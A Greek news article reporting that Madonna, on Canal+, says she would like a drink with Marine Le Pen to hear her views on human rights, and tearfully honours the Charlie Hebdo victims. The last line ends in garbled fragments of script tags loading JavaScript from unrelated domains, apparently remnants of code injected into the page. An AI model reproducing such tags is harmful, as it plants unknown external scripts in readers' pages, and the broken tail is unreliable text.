Η Madonna, το ποτό με τη Λεπέν και τα δάκρυα on air

Η Madonna, το ποτό με τη Λεπέν και τα δάκρυα on air

Ένα ποτό με την Μαρίν Λεπέν θέλει να πιει η Madonna. Η βασίλισσα της ποπ δήλωσε ότι θα ήθελε να «πιει ένα ποτό» με την επικεφαλής της γαλλικής ακροδεξιάς προκειμένου να ακούσει «από την ίδια τα πιστεύω της».

Παράλληλα εξέφρασε την αλληλεγγύη της στα θύματα της επίθεσης εναντίον της σατιρικής εφημερίδας Charlie Hebdo «οι ζωές των οποίων δεν χάθηκαν μάταια» όπως είπε η ίδια.

«Ίσως να μην έχω κατανοήσει τη Μαρίν Λεπέν, δεν είμαι σίγουρη και βεβαίως δεν θέλω να εμπλακώ σ’ έναν πόλεμο», είπε η Madonna στο τηλεοπτικό δίκτυο Canal+. «Σε ό,τι αφορά εμένα, ο κόσμος έχει μια ιδέα του ποια είμαι, ποιες είναι (οι αξίες) στις οποίες δεσμεύομαι, ποια είναι τα πιστεύω μου και πολύ συχνά, όταν πίνουν ένα ποτό μαζί μου, συζητούν μαζί μου, φεύγουν με μια διαφορετική άποψη», προσέθεσε.

«Αυτό που θέλω, είναι να επικρατεί ειρήνη στον κόσμο και η πρώτη μου σκέψη όταν σκέφτομαι τη Μαρίν Λεπέν είναι ότι θα ήθελα να τη συναντήσω, να της μιλήσω και θα ήθελα να μπορέσω να ακούσω από την ίδια, να ακούσω η ίδια ποια είναι τα πιστεύω της σχετικά με το θέμα των ανθρωπίνων δικαιωμάτων, όχι μόνο στη Γαλλία αλλά σε ολόκληρο τον κόσμο, είναι πολύ σημαντικό για μένα», είπε.

«Πιστεύω ότι οι ζωές σας δεν χάθηκαν μάταια» του είπε, με δάκρυα στα μάτια, αναφερόμενη στα θύματα της πολύνεκρης επίθεσης κατά την οποία αποδεκατίστηκε η συντακτική ομάδα της εφημερίδας την 7η Ιανουαρίου.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >